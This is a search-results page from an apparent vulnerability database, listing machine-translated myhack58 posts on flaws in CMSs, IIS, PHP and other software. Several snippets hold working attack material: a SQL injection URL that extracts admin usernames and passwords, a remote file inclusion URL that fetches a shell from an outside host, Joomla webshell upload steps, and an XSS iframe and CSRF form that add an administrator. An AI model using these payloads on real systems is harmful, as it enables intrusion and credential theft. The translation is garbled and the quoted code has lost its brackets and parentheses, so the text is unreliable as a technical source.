Lucene search
K
Myhack58Most viewed

7620 matches found

myhack58
myhack58
added 2012/12/06 12:0 a.m.26 views

The latest FCKEditor ASP upload bypass vulnerability-vulnerability warning-the black bar safety net

exploiut-db: FCKEditor ASP Version 2.6.8 File Upload Protection Bypass - Title: FCKEditor 2.6.8 ASP Version File Upload Protection bypass - Credit goes to: Mostafa Azizi, Soroush Dalili - Link:http://sourceforge. net/projects/fckeditor/files/FCKeditor/ - Description: There is no validation on...

Exploits0
myhack58
myhack58
added 2012/11/30 12:0 a.m.25 views

Lying in bed reading the Code of phpcms sql injection vulnerability-vulnerability warning-the black bar safety net

Lying in bed reading the Code of phpcms 0x01 In phpcms/modules/formguide/index. in php 5 7. $formguideinput = new formguideinput$formid; $data = $formguideinput-get$POST'info'; Here call a class,formguideinput, and then a get function to process$POST over the info, then, we take a look at this ge...

0.9AI score
Exploits0
myhack58
myhack58
added 2012/11/27 12:0 a.m.25 views

dedecms 5.7 edit. inc. php file injection-vulnerability warning-the black bar safety net

Vulnerability file edit. inc. php specific code:? php if! defined'DEDEINC' exit'Request Error!'; if! empty$COOKIE'GUESTBOOKPOS' $GUESTBOOKPOS = $COOKIE'GUESTBOOKPOS'; else $GUESTBOOKPOS = "guestbook.php"; $id = intval$id; ifempty$job $job='view'; if$job=='del' && $gisadmin $dsql-ExecuteNoneQuery"...

7.2AI score
Exploits0
myhack58
myhack58
added 2012/11/26 12:0 a.m.25 views

The new concept of foreign language network teaching platform to upload files and repair programme-vulnerability warning-the black bar safety net

Information disclosure and privilege is not strict result in the column directory and upload To a certain University, for example: http://www.myhack58.com /NPELS NPELSLearningCenter5. 0 client Update. exe. config file leaked an important address setting name="UpdateCommonSvrCommonService"...

7.2AI score
Exploits0
myhack58
myhack58
added 2012/11/08 12:0 a.m.25 views

phpcms v9 article reviews the filter LAX database sensitive information disclosure-vulnerability warning-the black bar safety net

phpcms v9 article reviews published 'a'; then reply to this comment can be burst table names and database prefix Vulnerability to prove: ! !...

2.3AI score
Exploits0
myhack58
myhack58
added 2012/09/19 12:0 a.m.25 views

The company's customer information and tracking management system CITMS 3.0 injection and upload vulnerabilities-vulnerability warning-the black bar safety net

Management system part of the function is as follows: (1)online add, modify, delete administrators (2)online add, modify, delete customer records, supporting HTML, etc.. (3)the front Desk recorded with the tracking function.. As well as the track record and the number of clicks on the display...

0.2AI score
Exploits0
myhack58
myhack58
added 2012/08/21 12:0 a.m.25 views

JJDD. COM to bypass permission verification any comment-vulnerability warning-the black bar safety net

http://jjdd.com/ for the heat of the people you want to reply to a comment, etc. are in need of red beans, and red beans to purchase. Now you can directly use this interface to bypass the front Desk permission to verify...

7.1AI score
Exploits0
myhack58
myhack58
added 2012/07/24 12:0 a.m.25 views

PHP global variables with the SESSION vulnerability, global and session-vulnerability warning-the black bar safety net

The first to see this a simple piece of code ? php sessionstart;$SESSION'isadmin'='yes';$isadmin='no';echo $SESSION'isadmin';?& gt; When php. ini in the configuration registerglobals = Off, Without any problems, Output yes but When php. ini in the configuration registerglobals = On time, First ru...

1.5AI score
Exploits0
myhack58
myhack58
added 2012/07/13 12:0 a.m.25 views

Joomla remote upload vulnerability. Direct getshell-a vulnerability warning-the black bar safety net

Author: 1 3 3 7 1. Some joomal need to register. http://site/index.php?option=comuser&view=login 2. To upload address http://site/index.php?option=comksadvertiser&Itemid=3 6&task=add&catid=0&lang=en 3. Click on image after click on upload,select the shell, the shell name for adm1n. php. the jpg...

7.2AI score
Exploits0
myhack58
myhack58
added 2012/07/08 12:0 a.m.25 views

IIS short file and folder disclosure vulnerability-vulnerability warning-the black bar safety net

本文 翻译 自 exploit-db.com,is hard to force Amderma children's shoes after hours of tossing,reproduced, please renowned provenance,tks. E Wen too the dish,if there is an error, please you greatly more correct. IIS is Microsoft using the Microsoft windows feature extension modules created a set ofweb...

7AI score
Exploits0
myhack58
myhack58
added 2012/07/04 12:0 a.m.25 views

Microsoft IIS file enumeration vulnerability-vulnerability warning-the black bar safety net

Release date: 2012-06-30 Update date: 2012-07-03 Affected system: Microsoft IIS 7.5 Microsoft IIS 7.0 Microsoft IIS 6.0 Microsoft IIS 1.0 Description: -------------------------------------------------------------------------------- BUGTRAQ ID: 5 4 2 5 1 Internet Information Services(IIS, the...

Exploits0
myhack58
myhack58
added 2012/05/23 12:0 a.m.25 views

The positive side of College administration management system-bug fixes-vulnerability warning-the black bar safety net

The positive side of College academic management system is a student performance, the course management system, there are many colleges and universities use the academic management systems. Recently the system broke a high-risk vulnerability, an attacker can use this vulnerability to easily get t...

2.4AI score
Exploits0
myhack58
myhack58
added 2012/05/19 12:0 a.m.25 views

Through the Zend directory permissions are not strict get execute permissions-bug warning-the black bar safety net

On the server a lot have installed Zend Even if C:\Program Files\ set permissions, install Zend, Zend will auto-configure directory permissions C:\Program Files\Zend\ZendOptimizer-3.3.0\ under the directory permissions for the Everyone full,which leads to the intruder can be written into the file...

0.8AI score
Exploits0
myhack58
myhack58
added 2012/03/30 12:0 a.m.25 views

EZEIP3. 0 multi-page upload validation vulnerability and fix-vulnerability warning-the black bar safety net

Modify the IE browser security settings, the modulation is the highest, however, prohibit the js execution. 2. Open the Modify upload Type page, add aspx type, click Save, and then open the upload page to upload There is a problem of the upload Type page:...

0.5AI score
Exploits0
myhack58
myhack58
added 2012/03/16 12:0 a.m.25 views

KingCMS ASP 5.0/5.1 vulnerability-vulnerability warning-the black bar safety net

KingCMS ASP is based on ASP+ACCESS framework of a very good CMS system, the reception is all static processing, the new generation of KingCMS provides a better interface, more development leeway, more powerful expansion capability, and now also by many webmasters welcome. But in the absence of th...

Exploits0
myhack58
myhack58
added 2012/03/06 12:0 a.m.25 views

An anti-injection of a noob error-thousand Bo enterprise program-vulnerability warning-the black bar safety net

Thousand Bo enterprise Station program, anti-injected into the statement where there is a little error! Detail: If EnableStopInjection = True Then If Request. QueryString "" Then Call StopInjectionRequest. QueryString If Request. Cookies "" Then Call StopInjectionRequest. Cookies If Request...

7.5AI score
Exploits0
myhack58
myhack58
added 2012/03/04 12:0 a.m.25 views

Netease blog The permission check is not strict cause blog in the encrypted log and the draft disclosure-vulnerability warning-the black bar safety net

Brief description: the vulnerability can cause users to blog in encrypted log friends visible, private, and log the draft leaked. Detailed description: The Netease blog log module of the AJAX request interface via the URL parameter to pass the user level, visitors, friends, bloggers, and not the...

7AI score
Exploits0
myhack58
myhack58
added 2012/02/10 12:0 a.m.25 views

Android webkit XSS cross-domain Auto-Download vulnerability-vulnerability warning-the black bar safety net

Android Multiple Vulnerabilities Author: www.80vul.com Email:5up3rh3igmail.com Release Date: 2012/2/8 References: http://www.80vul.com/android/android-0days.txt Ph4nt0m Webzine 0x06 has been releasedhttp://www.80vul.com/webzine0x06/,there three papers on the android application security about the...

0.2AI score
Exploits0
myhack58
myhack58
added 2012/02/05 12:0 a.m.25 views

Southern data editor(southidceditor)injection 0day vulnerabilities-vulnerability warning-the black bar safety net

Injection point:newssearch. asp? key=7%' union select 0,username%2BCHR1 2 4%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7 It may beanother versionnewssearch. asp? key=7%' union select 0,username%2BCHR1 2 4%2Bpassword,2,3,4,5,6,7,8,9,1 0 from admin where 1...

7.8AI score
Exploits0
myhack58
myhack58
added 2012/01/22 12:0 a.m.25 views

ptcms PT fiction thief PTNovelSteal any code written 0day-vulnerability warning-the black bar safety net

pt the novel system through the kill version. But the official is already out of the patch! (The fucking game! OK the following text to start:here is our own exchange platform, is part of our 90sec all members of the technical sharing platform! This sets the program user did not use the database,...

7.2AI score
Exploits0
myhack58
myhack58
added 2011/10/17 12:0 a.m.25 views

DEDECMS full version gotopage variable XSS ROOTKITS, 0DAY-vulnerability warning-the black bar safety net

Affected versions: DEDECMS full version The vulnerability described in: DEDECMS background landing template gotopage variable is not tested incoming data, leading toXSSvulnerabilities. \dede\templets\login.htm 6 5 the left and right input type="hidden" name="gotopage" value="? php if!...

1.3AI score
Exploits0
myhack58
myhack58
added 2011/10/17 12:0 a.m.25 views

BugFree plurality of defect and repair-vulnerability warning-the black bar safety net

Product: BugFree The development of this website: www.bugfree.org.cn Affected version: 2.1.3 and probably prior Tested version: 2.1.3 Defect type: XSS Cross Site Scripting Technical analysis: High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in BugFree , which can ...

6.8AI score
Exploits0
myhack58
myhack58
added 2011/09/28 12:0 a.m.25 views

redmind Online-Shop / E-Commerce-System SQL injection flaws and fixes-vulnerability warning-the black bar safety net

Title: redmind Online-Shop / E-Commerce-System SQL Injection Vulnerability Software address: Test platform: Linux IDBlackcoder Author: MbahSemar www.92hack.net The defect file: http://www.xxxx.net/product.php?prodID=SQLi Example http://www.xxx.net/product.php?prodID=9999 and 1=2 union select...

0.8AI score
Exploits0
myhack58
myhack58
added 2011/09/14 12:0 a.m.25 views

Slaed CMS code execution flaws and fixes-vulnerability warning-the black bar safety net

Title: Slaed CMS Code exec Author: brainpillow Download address: Test platform: OpenSlaed 1.2 free, Slaed CMS = 4. On different versions of this software next vulnerabilities are availible: www.badguest.cn/index.php?name=Search&mod=&word=$phpinfo&query=ok&to=view /index. php?...

2AI score
Exploits0
myhack58
myhack58
added 2011/06/25 12:0 a.m.25 views

Kingtop content management software injection vulnerability and fix-vulnerability warning-the black bar safety net

Vulnerability author: akast Vulnerability details a brief description: Vulnerability file:/news/index. aspx Vulnerability variable: MenuID Software type: business software Vulnerability Description: You can use the injection vulnerability to get the site administrator permissions, so you can logi...

1.2AI score
Exploits0
myhack58
myhack58
added 2011/06/15 12:0 a.m.25 views

ecshop the latest version (v272) the local contains to get SHELL-vulnerability warning-the black bar safety net

Looking directly at the code: js/calendar.php $lang = ! empty$GET'lang' ? trim$GET'lang' : ‘EN’;//no filter, obviously contains a vulnerability if ! fileexists‘../languages/’ . $lang . ‘/calendar.php’ $lang = ‘EN’; requiredirnamedirnameFILE . ‘/data/config.php’; header‘Content-type:...

7.2AI score
Exploits0
myhack58
myhack58
added 2011/05/07 12:0 a.m.25 views

WordPress arbitrary file upload vulnerability-vulnerability warning-the black bar safety net

Vulnerability description: WordPress is a Free Forum, Blog system, can be said to be the world on the usage of the most widely used blog program, the official Group is large, the speed quickly, there has been no explosion over a fatal vulnerability. The vulnerability appears in WordPress for uplo...

0.1AI score
Exploits0
myhack58
myhack58
added 2011/03/17 12:0 a.m.25 views

PHPWeb enterprise smart built Station system injection and repair-vulnerability warning-the black bar safety net

http://www.phpweb.net/down/class/index.php?myord=1 Directly into the tool can be run. Direct shangguan net: Database error: Invalid SQL: select from pwdowncon where iffb='1' and catid!=' 0' order by 1' desc limit 0,30 MySQL Error : 1 0 6 4 You have an error in your SQL syntax; check the manual...

7.7AI score
Exploits0
myhack58
myhack58
added 2011/03/10 12:0 a.m.25 views

Home improvement network 0day a gold-bug warning-the black bar safety net

Author: broken sword Release date: 2011-03-08 Vulnerability type: file upload Vulnerability file:gdChkLogin. asp Vulnerability description: I posted part of the code for analysis. % dim user1,pass1,rs,sql user1=trimrequest"textfield" "obtains input of a user name,the value assigned to user1"...

7.5AI score
Exploits0
myhack58
myhack58
added 2011/03/02 12:0 a.m.25 views

FeiXun enterprise website management system v2011 upload vulnerabilities pass to kill 0day-vulnerability warning-the black bar safety net

Affected version: v2011 Official website: http://www.webhtm.cn PRODUCT DESCRIPTION: Suitable Agent building a Business Site of the enterprise source code, The aspect of the practical! Program description: 1. Features: simplified and Traditional Chinese switch, the product display system, news...

6.8AI score
Exploits0
myhack58
myhack58
added 2011/02/28 12:0 a.m.25 views

boblog arbitrary variable overwrite vulnerability analysis-vulnerability warning-the black bar safety net

| by Ryatpuretot mail: puretot at gmail dot com team: http://www.80vul.com Find time 2008-10-02 Publication Date 2011-02-27 The vulnerabilities affect version 2.1.0 2.1.1 The state has been patched Vulnerability code is as follows: // go.php $qurl=$SERVER"REQUESTURI"; @list$relativePath,...

0.9AI score
Exploits0
myhack58
myhack58
added 2011/02/28 12:0 a.m.25 views

RW-Download 4.0.6 sql injection vulnerability and fix-vulnerability warning-the black bar safety net

| RW-Download is a supporting template and multilanguage version of upload and download system. RW-Download 4.0.6 version of the index. php existssql injectionvulnerabilities that could lead to sensitive information disclosure. +info: //Title ||= RW-Download v4. 0. 6 = index.php SQL Injection...

0.6AI score
Exploits0
myhack58
myhack58
added 2011/02/25 12:0 a.m.25 views

Use the IIS semicolon parsing upload vulnerability analysis-vulnerability warning-the black bar safety net

First look at the following a very common file upload extension filter code: fileExt=lcaseofile. FileExt arrUpFileType=splitUpFileType,"|" for i=0 to uboundarrUpFileType if fileEXT=trimarrUpFileTypei then EnableUpload=true exit for end if next if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" o...

1.6AI score
Exploits0
myhack58
myhack58
added 2011/02/19 12:0 a.m.25 views

Multi Agent System city. asp SQL injection vulnerability and fix-vulnerability warning-the black bar safety net

Author: R4dc0re Information Description: a Multi-Agent System of the city. asp the reason there may be the use ofSQL injectionis due to this file and there is insufficient filtering of user requests query caused. The use of this vulnerability may allow an attacker to use to the server application...

0.9AI score
Exploits0
myhack58
myhack58
added 2011/01/05 12:0 a.m.25 views

Weeds Weedcms v4. 0-5. 0 blind injection vulnerability-vulnerability warning-the black bar safety net

Weeds Weedcms v4. 0 sp1 to the latest 5.0 New Year Edition USERAGENT blind injection vulnerability Program description: wild Weedcms based on the PHP+MYSQL schema. Innovative content management mode, the establishment of channels can be defined in the content model, both in the background you can...

7.9AI score
Exploits0
myhack58
myhack58
added 2011/01/02 12:0 a.m.25 views

Zhumadian-day U.S.-China food network v3. 0 Business Edition XSS add management-vulnerability warning-the black bar safety net

Version:Zhumadian days of the U.S. Food network v3. 0 Business Edition Keywords:inurl:wenhuadisplay. asp XSS Code: iframe src=http:// 空间 的 域名 /xss.html Html Code: form name="admin" action="http:// 这里 目标 站 域名 /admin/adminaddsave.asp" method="POST" onSubmit="return validatethis" input type="text"...

7.2AI score
Exploits0
myhack58
myhack58
added 2010/12/24 12:0 a.m.25 views

web Thunder remote arbitrary file reading vulnerability-vulnerability warning-the black bar safety net

web Thunderbolt in the design and implementation problems, leading to a malicious attacker can read the install web Thunder user on the machine any files web Thunderbolt in the present machine there is a webserver, and the binding at 0. 0. 0. 0, while for the web request processing is not...

0.9AI score
Exploits0
myhack58
myhack58
added 2010/12/22 12:0 a.m.25 views

PHP Zip Extract method denial of service vulnerability-vulnerability warning-the black bar safety net

Affected system: PHP PHP 5.3.3 PHP PHP 5.3.2 PHP PHP 5.3.1 PHP PHP 5.3 PHP PHP 5.2 - 5.3.2 Not affected system: PHP PHP 5.3.4 PHP PHP 5.2.15 Description: -------------------------------------------------------------------------------- BUGTRAQ ID: 4 5 3 3 5 PHP is a widely-used General-purpose...

0.7AI score
Exploits0
myhack58
myhack58
added 2010/12/08 12:0 a.m.25 views

SOOP Portal 2.0 IIS parsing upload vulnerability-vulnerability warning-the black bar safety net

Publishing author: Net. Edit0r Affected versions: SOOP Portal 2.0 Official address: upload/2 0 1 0/1 2/2 0 1 0 1 2 0 7 1 9 4 0 2 9 3 6 8 6. jpg can be uploaded and executed. Google Dork : "SOOP Portal 2.0" 1. Register On Site //the first step to register as a website member; 2...

0.1AI score
Exploits0
myhack58
myhack58
added 2010/12/08 12:0 a.m.25 views

eimsBlog system V2. 4 0day vulnerabilities-vulnerability warning-the black bar safety net

Background backup function of the lack of validation, leading to local submit backup and recovery shell. asp Vulnerability testing exp: table width="9 8%" border="0" cellspacing="1" cellpAdding="1" align="center" class="table" form method="post" action="url/admin/DataM. asp?...

0.1AI score
Exploits0
myhack58
myhack58
added 2010/10/10 12:0 a.m.25 views

shopxp html version 2. 0 CSRF vulnerability-vulnerability warning-the black bar safety net

Program: shopxp html version 2. 0, the 1.0 should also be the same there Vulnerability: direct add administrator Keywords: is not found the keyword was depressed Program download:http://www.codepub.com/software/SHOPXP-7615.html !-- include file="xp. asp" - % dim adminid,action action=request...

7.4AI score
Exploits0
myhack58
myhack58
added 2010/09/18 12:0 a.m.25 views

dedecms v5. 3-v5. 6 Get Shell 0day exploit analysis-exploit warning-the black bar safety net

author:toby57 team:www.wolvez.org This 0day has already appeared quite a long time, today with dragons students provide the log to see the code, understand the vulnerability causes. Most of the students of Genesis is not interested, it's only published use of the method. Gif89adede:field...

7.1AI score
Exploits0
myhack58
myhack58
added 2010/09/17 12:0 a.m.25 views

Baigo CMS 1.1.1 the login box injection analysis to use-vulnerability warning-the black bar safety net

baigo CMS is the use of ASP + Access developed a website content management system. As long as the use of Windows Server system or a support ASP + Access server can be installed deployment, including the virtual host to. baigo CMS is also an open source, free website content management system...

0.2AI score
Exploits0
myhack58
myhack58
added 2010/09/15 12:0 a.m.25 views

ecshop modify any user password vulnerability-vulnerability warning-the black bar safety net

ecshop in the design of the authentication mechanism when there is a problem, resulting in malicious users can steal other user's password In ecshop permissions mechanisms which modify a password is needed to know the original password, but modified to retrieve the password of the Email without t...

0.7AI score
Exploits0
myhack58
myhack58
added 2010/08/02 12:0 a.m.25 views

phpWebSite search module cross-site scripting vulnerability-vulnerability warning-the black bar safety net

phpWebSite is a Web Content Management SystemCMS. phpWebSite realization on the presence of input validation vulnerabilities, a remote attacker could exploit this vulnerability in the user's browser to execute malicious code. phpWebSite search module does not properly escape user input in the...

0.9AI score
Exploits0
myhack58
myhack58
added 2010/07/01 12:0 a.m.25 views

HDWiki Encyclopedia program background Getshell vulnerabilities-vulnerability warning-the black bar safety net

HDWiki using the template mechanism, the template is compiled will be saved to the data/view directory for php files, after the show template and the include it, Cause you can get a webshell Vulnerability code in lib/template. class. php file: function display$file//show the template by...

7.3AI score
Exploits0
myhack58
myhack58
added 2010/06/25 12:0 a.m.25 views

dede5. 5 pass to kill ODAY-vulnerability warning-the black bar safety net

The official temporarily not a patch,but I estimate the fast implementation of success will be in the data/cache to generate t. php word pony password t, the latest official GBK and utf-8 version of the existence of this vulnerability, the exp obtained characteristics is the production of t. php...

0.1AI score
Exploits0
myhack58
myhack58
added 2010/06/20 12:0 a.m.25 views

iphone/ipod discover the File Manager web service directory traversal vulnerability-vulnerability warning-the black bar safety net

from:Xeye Team discover is an iphone/ipod touch platform on the popular file Manager, can read pdf/office/txt format files And via wifi to share these files, a detailed description look at this: http://itunes.apple.com/us/app/discover/id292416855?mt=8 Vulnerability analysis When the wifi...

0.4AI score
Exploits0
myhack58
myhack58
added 2010/06/17 12:0 a.m.25 views

RTRandomImage<==0.1 remote file inclusion vulnerability-vulnerability warning-the black bar safety net

RTRandomImage==0.1 program index. php file exists remote file inclusion vulnerabilities. Trojan: a http://localhost/RTRandomimage/index.php?textname=inj3ct0r sh3ll demo: http://site/RTRandomimage/index.php?textname=http://www.hackqing.cn/shell.txt?...

0.6AI score
Exploits0
myhack58
myhack58
added 2010/05/14 12:0 a.m.25 views

BBSGood Forum program multi-page SQL injection vulnerability-vulnerability warning-the black bar safety net

BBSGOOD is domestic first using the cache technology Forum, BBSGOOD posts and list home can generate a static HTML file. 1. In the file DelShortInFo. asp: selectid=trimRequestCStringSafeRequest"selectid" //the 1 Line 1 If selectid"" then selectid = replaceselectid, ", ", " or ID=" selectid="Where...

7.2AI score
Exploits0
Total number of security vulnerabilities5000